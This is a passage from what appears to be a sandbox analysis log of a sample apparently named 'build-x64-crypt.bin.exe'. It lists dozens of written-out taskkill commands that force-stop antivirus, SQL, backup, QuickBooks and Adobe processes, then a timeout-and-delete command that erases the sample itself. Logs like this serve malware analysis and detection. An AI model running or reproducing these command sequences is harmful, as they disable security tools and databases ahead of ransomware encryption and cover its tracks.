    3⤵
    - Kills process with taskkill
    PID:2128
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM QBDBMgrN*
  2⤵
  PID:628
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBDBMgrN*
    3⤵
    PID:2148
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM mysqld*
  2⤵
  PID:2744
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM mysqld*
    3⤵
    PID:840
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM AutodeskDesktopApp*
  2⤵
  PID:2784
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM AutodeskDesktopApp*
    3⤵
    PID:3768
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM acwebbrowser*
  2⤵
  PID:1468
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM acwebbrowser*
    3⤵
    - Kills process with taskkill
    PID:1048
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM Creative Cloud*
  2⤵
  PID:1360
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Creative Cloud*
    3⤵
    - Kills process with taskkill
    PID:1188
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM Adobe Desktop Service*
  2⤵
  PID:1220
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Adobe Desktop Service*
    3⤵
    - Kills process with taskkill
    PID:252
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM CoreSync*
  2⤵
  PID:2980
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM CoreSync*
    3⤵
    PID:3864
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM Adobe CEF Helper*
  2⤵
  PID:1772
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Adobe CEF Helper*
    3⤵
    - Kills process with taskkill
    PID:1844
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM node*
  2⤵
  PID:3208
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM node*
    3⤵
    - Kills process with taskkill
    PID:3260
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM AdobeIPCBroker*
  2⤵
  PID:3104
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM AdobeIPCBroker*
    3⤵
    - Kills process with taskkill
    PID:3156
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM sync-taskbar*
  2⤵
  PID:2212
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sync-taskbar*
    3⤵
    - Kills process with taskkill
    PID:2956
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM sync-worker*
  2⤵
  PID:3692
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sync-worker*
    3⤵
    - Kills process with taskkill
    PID:420
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM InputPersonalization*
  2⤵
  PID:1628
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM InputPersonalization*
    3⤵
    - Kills process with taskkill
    PID:2148
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM AdobeCollabSync*
  2⤵
  PID:2132
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM AdobeCollabSync*
    3⤵
    - Kills process with taskkill
    PID:1000
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM BrCtrlCntr*
  2⤵
  PID:3772
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM BrCtrlCntr*
    3⤵
    - Kills process with taskkill
    PID:1184
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM BrCcUxSys*
  2⤵
  PID:896
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM BrCcUxSys*
    3⤵
    PID:1216
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM SimplyConnectionManager*
  2⤵
  PID:1424
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SimplyConnectionManager*
    3⤵
    - Kills process with taskkill
    PID:1188
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM Simply.SystemTrayIcon*
  2⤵
  PID:1220
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Simply.SystemTrayIcon*
    3⤵
    PID:3524
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM fbguard*
  2⤵
  PID:3252
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM fbguard*
    3⤵
    PID:3684
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM fbserver*
  2⤵
  PID:2168
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM fbserver*
    3⤵
    - Kills process with taskkill
    PID:2480
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM ONENOTEM*
  2⤵
  PID:2444
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM ONENOTEM*
    3⤵
    - Kills process with taskkill
    PID:492
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM wrapper*
  2⤵
  PID:1956
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM wrapper*
    3⤵
    - Kills process with taskkill
    PID:3880
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM DefWatch*
  2⤵
  PID:2728
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM DefWatch*
    3⤵
    - Kills process with taskkill
    PID:2108
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM ccEvtMgr*
  2⤵
  PID:2112
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM ccEvtMgr*
    3⤵
    - Kills process with taskkill
    PID:3760
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM ccSetMgr*
  2⤵
  PID:636
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM ccSetMgr*
    3⤵
    PID:900
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM SavRoam*
  2⤵
  PID:644
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SavRoam*
    3⤵
    PID:1228
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM Sqlservr*
  2⤵
  PID:3764
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Sqlservr*
    3⤵
    PID:260
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM sqlagent*
  2⤵
  PID:364
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqlagent*
    3⤵
    PID:1604
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM sqladhlp*
  2⤵
  PID:1648
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqladhlp*
    3⤵
    - Kills process with taskkill
    PID:276
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM Culserver*
  2⤵
  PID:252
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Culserver*
    3⤵
    - Kills process with taskkill
    PID:2484
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM RTVscan*
  2⤵
  PID:2440
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM RTVscan*
    3⤵
    - Kills process with taskkill
    PID:2228
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM sqlbrowser*
  2⤵
  PID:2580
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqlbrowser*
    3⤵
    - Kills process with taskkill
    PID:2572
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM SQLADHLP*
  2⤵
  PID:2444
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLADHLP*
    3⤵
    - Kills process with taskkill
    PID:2680
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM QBIDPService*
  2⤵
  PID:2200
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBIDPService*
    3⤵
    PID:2056
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM Intuit.QuickBooks.FCS*
  2⤵
  PID:1692
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM Intuit.QuickBooks.FCS*
    3⤵
    - Kills process with taskkill
    PID:996
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM QBCFMonitorService*
  2⤵
  PID:808
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM QBCFMonitorService*
    3⤵
    PID:2936
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM sqlwriter*
  2⤵
  PID:1368
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM sqlwriter*
    3⤵
    - Kills process with taskkill
    PID:1100
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM msmdsrv*
  2⤵
  PID:248
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM msmdsrv*
    3⤵
    PID:1216
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM tomcat6*
  2⤵
  PID:1492
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM tomcat6*
    3⤵
    - Kills process with taskkill
    PID:1188
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM zhudongfangyu*
  2⤵
  PID:3836
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM zhudongfangyu*
    3⤵
    - Kills process with taskkill
    PID:3524
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM vmware-usbarbitator64*
  2⤵
  PID:3008
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM vmware-usbarbitator64*
    3⤵
    PID:3684
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM vmware-converter*
  2⤵
  PID:2416
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM vmware-converter*
    3⤵
    - Kills process with taskkill
    PID:2480
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM dbsrv12*
  2⤵
  PID:2420
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM dbsrv12*
    3⤵
    - Kills process with taskkill
    PID:492
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM dbeng8*
  2⤵
  PID:1948
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM dbeng8*
    3⤵
    - Kills process with taskkill
    PID:3880
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
  2⤵
  PID:2020
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    3⤵
    - Kills process with taskkill
    PID:2108
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*
  2⤵
  PID:2120
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$VEEAMSQL2012*
    3⤵
    - Kills process with taskkill
    PID:3760
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
  2⤵
  PID:3840
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
    3⤵
    - Kills process with taskkill
    PID:900
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM SQLBrowser*
  2⤵
  PID:3824
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLBrowser*
    3⤵
    PID:2784
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM SQLWriter*
  2⤵
  PID:1488
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLWriter*
    3⤵
    - Kills process with taskkill
    PID:260
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM FishbowlMySQL*
  2⤵
  PID:896
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM FishbowlMySQL*
    3⤵
    - Kills process with taskkill
    PID:1604
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
  2⤵
  PID:1424
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##WID*
    3⤵
    - Kills process with taskkill
    PID:276
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM MySQL57*
  2⤵
  PID:1220
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MySQL57*
    3⤵
    PID:2484
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
  2⤵
  PID:1836
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
    3⤵
    - Kills process with taskkill
    PID:2228
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLServerADHelper100*
  2⤵
  PID:2168
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQLServerADHelper100*
    3⤵
    - Kills process with taskkill
    PID:2572
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
  2⤵
  PID:3872
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
    3⤵
    PID:2680
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM msftesql-Exchange*
  2⤵
  PID:1956
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM msftesql-Exchange*
    3⤵
    - Kills process with taskkill
    PID:2056
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
  2⤵
  PID:2728
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
    3⤵
    - Kills process with taskkill
    PID:996
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$SBSMONITORING*
  2⤵
  PID:2112
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$SBSMONITORING*
    3⤵
    - Kills process with taskkill
    PID:2936
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQL$SHAREPOINT*
  2⤵
  PID:636
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQL$SHAREPOINT*
    3⤵
    - Kills process with taskkill
    PID:1100
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
  2⤵
  PID:644
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
    3⤵
    - Kills process with taskkill
    PID:1216
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
  2⤵
  PID:3764
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
    3⤵
    PID:1188
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$SBSMONITORING*
  2⤵
  PID:364
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLAgent$SBSMONITORING*
    3⤵
    PID:3524
- C:\Windows\SYSTEM32\cmd.exe
  cmd /C taskkill /F /T /IM SQLAgent$SHAREPOINT*
  2⤵
  PID:1648
- - C:\Windows\system32\taskkill.exe
    taskkill /F /T /IM SQLAgent$SHAREPOINT*
    3⤵
    - Kills process with taskkill
    PID:3684
- C:\Windows\System32\cmd.exe
  "C:\Windows\System32\cmd.exe" /C timeout /T 15 /NOBREAK && del "C:\Users\Admin\AppData\Local\Temp\build-x64-crypt.bin.exe" /F
  2⤵
  PID:2976
- - C:\Windows\system32\timeout.exe
    timeout /T 15 /NOBREAK
    3⤵
    - Delays execution with timeout.exe
    PID:644